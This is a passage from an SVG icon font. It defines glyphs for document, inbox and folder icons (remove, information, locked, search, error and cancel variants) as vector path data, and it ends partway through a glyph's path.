<glyph unicode="&#xe9e0;" glyph-name="document-remove" d="M552.229 32v0 0c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v371.191l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h328.312zM531.191 64h-307.192c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-326.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0 0zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM688 0v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM576 160v-32h224v32h-224z" />
<glyph unicode="&#xe9e1;" glyph-name="document-remove2" d="M512.698 32h-288.781c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-303.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM688-32v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM576 160v-32h224v32h-224z" />
<glyph unicode="&#xe9e2;" glyph-name="document-forbidden" d="M800.51 233.883c19.706-24.635 31.49-55.883 31.49-89.883 0-79.529-64.471-144-144-144-34 0-65.248 11.784-89.883 31.49l202.393 202.393zM777.883 256.51l-202.393-202.393c-19.706 24.635-31.49 55.883-31.49 89.883 0 79.529 64.471 144 144 144 34 0 65.248-11.784 89.883-31.49zM552.229 32v0 0c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v371.191l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h328.312zM531.191 64h-307.192c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-326.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0 0zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719z" />
<glyph unicode="&#xe9e3;" glyph-name="document-forbidden2" d="M824.588 255.004c24.641-30.283 39.412-68.918 39.412-111.004 0-97.202-78.798-176-176-176-42.085 0-80.72 14.771-111.004 39.412l247.591 247.591zM802.228 277.899c-30.742 26.251-70.634 42.101-114.228 42.101-97.202 0-176-78.798-176-176 0-43.594 15.85-83.486 42.101-114.228l248.128 248.128zM512.698 32h-288.781c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-303.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9e4;" glyph-name="document-information" d="M552.229 32v0 0c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v371.191l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h328.312zM531.191 64h-307.192c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-326.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0 0zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM688 0v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM640 160v-32h32v-32h-32v-32h96v32h-32v64h-64zM672 224v-32h32v32h-32z" />
<glyph unicode="&#xe9e5;" glyph-name="document-information2" d="M512.698 32h-288.781c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-303.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM688-32v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM640 160v-32h32v-32h-32v-32h96v32h-32v64h-64zM672 224v-32h32v32h-32z" />
<glyph unicode="&#xe9e6;" glyph-name="folder-information" d="M691.191 160v0c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v134.625h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h627.416zM712.229 128h-648.444c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-243.348c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM32 576h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM848 96c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM832 320v-32h32v32h-32zM800 256v-32h32v-32h-32v-32h96v32h-32v64h-64z" />
<glyph unicode="&#xe9e7;" glyph-name="folder-information2" d="M672.698 128h-608.913c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-208.098c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM0 576v-32h928v32h-928zM848 64v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM800 256v-32h32v-32h-32v-32h96v32h-32v64h-64zM832 320v-32h32v32h-32z" />
<glyph unicode="&#xe9e8;" glyph-name="document-list" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM480 512v-32h256v32h-256zM320 544h96v-96h-96v96zM352 512v-32h32v32h-32zM320 384h96v-96h-96v96zM352 352v-32h32v32h-32zM480 352v-32h256v32h-256zM320 224h96v-96h-96v96zM352 192v-32h32v32h-32zM480 192v-32h256v32h-256z" />
<glyph unicode="&#xe9e9;" glyph-name="document-list2" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM480 512v-32h256v32h-256zM320 544v-96h96v96h-96zM352 512v-32h32v32h-32zM320 384v-96h96v96h-96zM352 352v-32h32v32h-32zM480 352v-32h256v32h-256zM320 224v-96h96v96h-96zM352 192v-32h32v32h-32zM480 192v-32h256v32h-256z" />
<glyph unicode="&#xe9ea;" glyph-name="document-font" d="M704 143.994c-13.371-10.043-29.99-15.994-48-15.994-44.183 0-80 35.817-80 80s35.817 80 80 80c18.010 0 34.629-5.951 48-15.994v15.994h32v-160h-32v15.994zM477.714 224h-91.429l-34.286-96h-32l96 256h32l96-256h-32l-34.286 96zM466.286 256l-34.286 96-34.286-96h68.571zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM656 160c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xe9eb;" glyph-name="document-font2" d="M704 143.994c-13.371-10.043-29.99-15.994-48-15.994-44.183 0-80 35.817-80 80s35.817 80 80 80c18.010 0 34.629-5.951 48-15.994v15.994h32v-160h-32v15.994zM477.714 224h-91.429l-34.286-96h-32l96 256h32l96-256h-32l-34.286 96zM466.286 256l-34.286 96-34.286-96h68.571zM608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM656 160c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xe9ec;" glyph-name="inbox" d="M672 448h216.801l-140 224h-441.602l-140-224h216.801v-64.067c0-35.309 28.667-63.933 63.917-63.933h160.167c35.3 0 63.917 28.744 63.917 63.933v64.067zM704 416v-48c0-44.491-35.761-80-79.874-80h-192.252c-44.185 0-79.874 35.817-79.874 80v48h-192v-224h736v224h-192zM128 432v16l160 256h480l160-256v-288h-800v272z" />
<glyph unicode="&#xe9ed;" glyph-name="inbox2" d="M384 448v-63.811c0-35.451 28.667-64.189 63.917-64.189h160.167c35.3 0 63.917 28.37 63.917 64.189v63.811h216.801l-140 224h-441.602l-140-224h216.801zM128 448l160 256h480l160-256v-288h-800v288z" />
<glyph unicode="&#xe9ee;" glyph-name="inboxes" d="M640 576h216.801l-140 224h-441.602l-140-224h216.801v-64.067c0-35.309 28.667-63.933 63.917-63.933h160.167c35.3 0 63.917 28.744 63.917 63.933v64.067zM672 544v-48c0-44.491-35.761-80-79.874-80h-192.252c-44.185 0-79.874 35.817-79.874 80v48h-192v-224h736v224h-192zM896 304v-272h-800v544l160 256h480l160-256v-272zM352 288v-32.067c0-35.309 28.667-63.933 63.917-63.933h160.167c35.3 0 63.917 28.744 63.917 63.933v32.067h-288zM672 288v-48c0-44.491-35.761-80-79.874-80h-192.252c-44.185 0-79.874 35.817-79.874 80v48h-192v-224h736v224h-192z" />
<glyph unicode="&#xe9ef;" glyph-name="inboxes2" d="M896 320v256l-160 256h-480l-160-256v-256h800zM352 288h-256v-256h800v256h-256v-48.001c0-44.437-28.616-79.999-63.917-79.999h-160.167c-35.249 0-63.917 35.817-63.917 79.999v48.001zM352 576h-216.801l140 224h441.602l140-224h-216.801v-63.811c0-35.82-28.616-64.189-63.917-64.189h-160.167c-35.249 0-63.917 28.739-63.917 64.189v63.811z" />
<glyph unicode="&#xe9f0;" glyph-name="inbox-document" d="M640 352h128v224h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.045-31.858-32.098v-415.902h128v-64.067c0-35.309 28.667-63.933 63.917-63.933h160.167c35.3 0 63.917 28.744 63.917 63.933v64.067zM672 320v-48c0-44.491-35.761-80-79.874-80h-192.252c-44.185 0-79.874 35.817-79.874 80v48h-192v-224h736v224h-192zM96 336v16l96 153.6v262.242c0 35.453 28.693 64.158 64.088 64.158h351.912l192-224v-102.4l96-153.6v-288h-800v272zM192 352v90.881l-56.801-90.881h56.801zM800 352h56.801l-56.801 90.881v-90.881zM608 784v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9f1;" glyph-name="inbox-document2" d="M640 352v-64.067c0-35.189-28.616-63.933-63.917-63.933h-160.167c-35.249 0-63.917 28.624-63.917 63.933v64.067h-128v415.902c0 18.053 14.264 32.098 31.858 32.098h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-224h-128zM896 304v48l-96 153.6v102.4l-192 224h-351.912c-35.395 0-64.088-28.705-64.088-64.158v-262.242l-96-153.6v-288h800v240zM192 352h-56.801l56.801 90.881v-90.881zM856.801 352h-56.801v90.881l56.801-90.881zM608 784l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719z" />
<glyph unicode="&#xe9f2;" glyph-name="inbox-document-text" d="M672 320h192v-224h-736v224h192v-48c0-44.183 35.689-80 79.874-80h192.252c44.113 0 79.874 35.509 79.874 80v48zM96 336v-272h800v288l-96 153.6v102.4l-192 224h-351.912c-35.395 0-64.088-28.705-64.088-64.158v-262.242l-96-153.6v-16zM192 352h-56.801l56.801 90.881v-90.881zM800 352v90.881l56.801-90.881h-56.801zM224 352v415.902c0 18.053 14.264 32.098 31.858 32.098h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-224h-544zM608 784l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM352 320h288v-48c0-26.694-21.582-48-48.205-48h-191.591c-26.558 0-48.205 21.49-48.205 48v48zM288 480v-32h416v32h-416zM288 736v-32h224v32h-224zM288 608v-32h224v32h-224z" />
<glyph unicode="&#xe9f3;" glyph-name="inbox-document-text2" d="M896 304v48l-96 153.6v102.4l-192 224h-351.912c-35.395 0-64.088-28.705-64.088-64.158v-262.242l-96-153.6v-288h800v240zM192 352h-56.801l56.801 90.881v-90.881zM856.801 352h-56.801v90.881l56.801-90.881zM224 352v415.902c0 18.053 14.264 32.098 31.858 32.098h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-224h-544zM608 784l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM288 480v-32h416v32h-416zM288 736v-32h224v32h-224zM288 608v-32h224v32h-224zM352 288v32h288v-32c0-35.593-28.616-64-63.917-64h-160.167c-35.249 0-63.917 28.654-63.917 64z" />
<glyph unicode="&#xe9f4;" glyph-name="inbox-download" d="M480 448l-104 104-24-24 144-144 144 144-24 24-104-104v352h-32v-352zM544 608h172.801l140-224h-216.801v-64.067c0-35.189-28.616-63.933-63.917-63.933h-160.167c-35.249 0-63.917 28.624-63.917 63.933v64.067h-216.801l140 224h172.801v32h-192l-160-256v-288h800v288l-160 256h-192v-32zM672 352h192v-224h-736v224h192v-48c0-44.183 35.689-80 79.874-80h192.252c44.113 0 79.874 35.509 79.874 80v48z" />
<glyph unicode="&#xe9f5;" glyph-name="inbox-download2" d="M480 448l-104 104-24-24 144-144 144 144-24 24-104-104v352h-32v-352zM640 384h216.801l-140 224h-172.801v32h192l160-256v-288h-800v288l160 256h192v-32h-172.801l-140-224h216.801v-64c0-35.346 28.667-64 63.917-64h160.167c35.3 0 63.917 28.407 63.917 64v64z" />
<glyph unicode="&#xe9f6;" glyph-name="inbox-upload" d="M480 800l-104-104-24 24 144 144 144-144-24-24-104 104v-352h-32v352zM544 608h172.801l140-224h-216.801v-64.067c0-35.189-28.616-63.933-63.917-63.933h-160.167c-35.249 0-63.917 28.624-63.917 63.933v64.067h-216.801l140 224h172.801v32h-192l-160-256v-288h800v288l-160 256h-192v-32zM672 352h192v-224h-736v224h192v-48c0-44.183 35.689-80 79.874-80h192.252c44.113 0 79.874 35.509 79.874 80v48z" />
<glyph unicode="&#xe9f7;" glyph-name="inbox-upload2" d="M480 800l-104-104-24 24 144 144 144-144-24-24-104 104v-352h-32v352zM640 384h216.801l-140 224h-172.801v32h192l160-256v-288h-800v288l160 256h192v-32h-172.801l-140-224h216.801v-64c0-35.346 28.667-64 63.917-64h160.167c35.3 0 63.917 28.407 63.917 64v64z" />
<glyph unicode="&#xe9f8;" glyph-name="folder2" d="M512 672h383.813c35.482 0 64.187-28.583 64.187-63.843v-448.314c0-35.279-28.558-63.843-63.785-63.843h-800.43c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128zM491.52 640l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-576.525c0-17.528 14.275-31.738 31.775-31.738h800.45c17.549 0 31.775 14.228 31.775 32.028v447.944c0 17.689-14.522 32.028-32.095 32.028h-404.385z" />
<glyph unicode="&#xe9f9;" glyph-name="folder3" d="M512 672l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813z" />
<glyph unicode="&#xe9fa;" glyph-name="folder4" d="M64 544v192.262c0 17.168 14.208 31.738 31.736 31.738h333.065l62.719-128h404.385c17.573 0 32.095-14.339 32.095-32.028v-63.972h-864zM64 512h864v-351.972c0-17.8-14.226-32.028-31.775-32.028h-800.45c-17.499 0-31.775 14.209-31.775 31.738v352.262zM512 672l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813z" />
<glyph unicode="&#xe9fb;" glyph-name="folder5" d="M32 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM32 512v-352.283c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v352.157h-928z" />
<glyph unicode="&#xe9fc;" glyph-name="folders" d="M32 480v192.262c0 17.168 14.208 31.738 31.736 31.738h333.065l62.719-128h404.385c17.573 0 32.095-14.339 32.095-32.028v-63.972h-864zM32 448h864v-351.972c0-17.8-14.226-32.028-31.775-32.028h-800.45c-17.499 0-31.775 14.209-31.775 31.738v352.262zM96 768v32.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-448.314c0-35.279-28.558-63.843-63.785-63.843h-0.215v32h0.225c17.549 0 31.775 14.228 31.775 32.028v447.944c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-32.262h-32zM480 608l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813z" />
<glyph unicode="&#xe9fd;" glyph-name="folders2" d="M0 480v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM0 448v-352.283c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v352.157h-928zM96 768v32.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-448.314c0-35.279-28.558-63.843-63.785-63.843h-0.215v383.996c0 53.022-42.956 96.004-96.107 96.004h-351.893l-64 128h-352z" />
<glyph unicode="&#xe9fe;" glyph-name="folder-download2" d="M512 512h416v-351.972c0-17.8-14.226-32.028-31.775-32.028h-800.45c-17.499 0-31.775 14.209-31.775 31.738v352.262h416v-289.6l-104 104-24-24 144-144 144 144-24 24-104-104v289.6zM64 544v192.262c0 17.168 14.208 31.738 31.736 31.738h333.065l62.719-128h404.385c17.573 0 32.095-14.339 32.095-32.028v-63.972h-864zM512 672l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813z" />
<glyph unicode="&#xe9ff;" glyph-name="folder-download3" d="M512 512h448v-352.157c0-35.279-28.558-63.843-63.785-63.843h-800.43c-34.994 0-63.785 28.527-63.785 63.717v352.283h448v-289.6l-104 104-24-24 144-144 144 144-24 24-104-104v289.6zM32 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928z" />
<glyph unicode="&#xea00;" glyph-name="folder-upload2" d="M480 128h-384.225c-17.499 0-31.775 14.209-31.775 31.738v352.262h864v-351.972c0-17.8-14.226-32.028-31.775-32.028h-384.225v288l104-104 24 24-144 144-144-144 24-24 104 104v-288zM64 544v192.262c0 17.168 14.208 31.738 31.736 31.738h333.065l62.719-128h404.385c17.573 0 32.095-14.339 32.095-32.028v-63.972h-864zM512 672l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813z" />
<glyph unicode="&#xea01;" glyph-name="folder-upload3" d="M480 96h-384.215c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-352.157c0-35.279-28.558-63.843-63.785-63.843h-384.215v288l104-104 24 24-144 144-144-144 24-24 104 104v-288zM32 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928z" />
<glyph unicode="&#xea02;" glyph-name="folder-unlocked" d="M736 160h-672.225c-17.499 0-31.775 14.209-31.775 31.738v352.262h864v-65.137c-5.227 0.75-10.569 1.137-16 1.137-61.856 0-112-50-112-111.92v-80.080c-17.673 0-32-14.012-32-32.094v-95.906zM928 469.204v170.954c0 35.259-28.706 63.843-64.187 63.843h-383.813l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h672.215v-31.906c0-17.725 14.282-32.094 31.921-32.094h224.157c17.63 0 31.921 14.012 31.921 32.094v159.813c0 17.725-14.165 32.094-31.967 32.094h-192.033v79.702c0 44.702 35.817 80.298 80 80.298 44.491 0 80-35.95 80-80.298v-15.702h32v16.080c0 44.625-26.201 83.15-64 101.124v0 0zM32 576v192.262c0 17.168 14.208 31.738 31.736 31.738h333.065l62.719-128h404.385c17.573 0 32.095-14.339 32.095-32.028v-63.972h-864zM784.11 256h191.781c8.657 0 16.11-7.13 16.11-15.926v-128.147c0-9.051-7.212-15.926-16.11-15.926h-191.781c-8.657 0-16.11 7.13-16.11 15.926v128.147c0 9.051 7.212 15.926 16.11 15.926z" />
<glyph unicode="&#xea03;" glyph-name="folder-unlocked2" d="M0 576v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.611 64.187-63.904v-64.096h-928zM0 544v-352.283c0-35.19 28.47-63.717 63.717-63.717h640.283v128.083c0 23.626 12.871 44.296 32 55.358v56.371c0 79.625 64.471 144.188 144 144.188 16.82 0 32.978-2.899 48-8.227v40.227h-928zM960 288h32.079c17.639 0 31.921-14.369 31.921-32.094v-159.813c0-18.082-14.292-32.094-31.921-32.094h-224.157c-17.639 0-31.921 14.369-31.921 32.094v159.813c0 18.082 14.292 32.094 32 32.094v80.080c0 61.92 50.144 111.92 112 111.92 61.73 0 112-50.109 112-111.92v-16.080h-32v15.702c0 44.347-35.509 80.298-80 80.298-44.183 0-80-35.596-80-80.298v-79.702h160z" />
<glyph unicode="&#xea04;" glyph-name="folder-locked" d="M736 160v95.906c0 18.082 14.292 32.094 31.921 32.094h0.079v47.827c0 62.007 50.144 112.173 112 112.173 5.431 0 10.773-0.389 16-1.14v97.14h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h672.225zM736 128h-672.215c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-202.978c37.799-18.014 64-56.626 64-101.352v-47.827h0.079c17.639 0 31.921-14.369 31.921-32.094v-159.813c0-18.082-14.292-32.094-31.921-32.094h-224.157c-17.639 0-31.921 14.369-31.921 32.094v31.906zM800 288h160v47.702c0 44.347-35.509 80.298-80 80.298-44.183 0-80-35.596-80-80.298v-47.702zM32 576h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM784.11 256c-8.897 0-16.11-6.875-16.11-15.926v-128.147c0-8.796 7.453-15.926 16.11-15.926h191.781c8.897 0 16.11 6.875 16.11 15.926v128.147c0 8.796-7.453 15.926-16.11 15.926h-191.781z" />
<glyph unicode="&#xea05;" glyph-name="folder-locked2" d="M0 576v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.611 64.187-63.904v-64.096h-928zM0 544v-352.283c0-35.19 28.47-63.717 63.717-63.717h640.283v128.083c0 23.626 12.871 44.296 32 55.358v56.371c0 79.625 64.471 144.188 144 144.188 16.82 0 32.978-2.899 48-8.227v40.227h-928zM768 367.827l-0.079-79.827c-17.63 0-31.921-14.012-31.921-32.094v-159.813c0-17.725 14.282-32.094 31.921-32.094h224.157c17.63 0 31.921 14.012 31.921 32.094v159.813c0 17.725-14.282 32.094-32 32.094v79.827c0 61.951-50.27 112.173-112 112.173-61.856 0-112-50.166-112-112.173zM800 367.702c0 44.702 35.817 80.298 80 80.298 44.491 0 80-35.95 80-80.298v-79.702h-160v79.702z" />
<glyph unicode="&#xea06;" glyph-name="folder-search" d="M521.883 319.49c-24.635-19.706-55.883-31.49-89.883-31.49-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144 0-34-11.784-65.248-31.49-89.883l171.136-171.136-22.627-22.627-171.136 171.136zM512 672h383.813c35.482 0 64.187-28.583 64.187-63.843v-448.314c0-35.279-28.558-63.843-63.785-63.843h-800.43c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128zM491.52 640l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-576.525c0-17.528 14.275-31.738 31.775-31.738h800.45c17.549 0 31.775 14.228 31.775 32.028v447.944c0 17.689-14.522 32.028-32.095 32.028h-404.385zM432 320c61.856 0 112 50.144 112 112s-50.144 112-112 112c-61.856 0-112-50.144-112-112s50.144-112 112-112v0z" />
<glyph unicode="&#xea07;" glyph-name="folder-search2" d="M521.883 319.49c-24.635-19.706-55.883-31.49-89.883-31.49-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144 0-34-11.784-65.248-31.49-89.883l171.136-171.136-22.627-22.627-171.136 171.136zM512 672l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813zM432 320c61.856 0 112 50.144 112 112s-50.144 112-112 112c-61.856 0-112-50.144-112-112s50.144-112 112-112v0z" />
<glyph unicode="&#xea08;" glyph-name="folder-error" d="M664.727 128l151.273 256 80-135.385v263.385h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h600.952zM645.818 96h-582.033c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-413.696l96-162.462h-416l37.818 64zM32 544h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM816 320l-152-256h304l-152 256zM800 256v-96h32v96h-32zM800 128v-32h32v32h-32z" />
<glyph unicode="&#xea09;" glyph-name="folder-error2" d="M608.222 96h-544.437c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-253.741l-112 189.741-207.778-352zM0 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM816 384l208-352h-416l208 352zM800 256v-96h32v96h-32zM800 128v-32h32v32h-32z" />
<glyph unicode="&#xea0a;" glyph-name="folder-cancel" d="M848 185.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM691.191 128v0c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v134.625h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h627.416zM712.229 96h-648.444c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-243.348c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM32 544h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM848 64c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 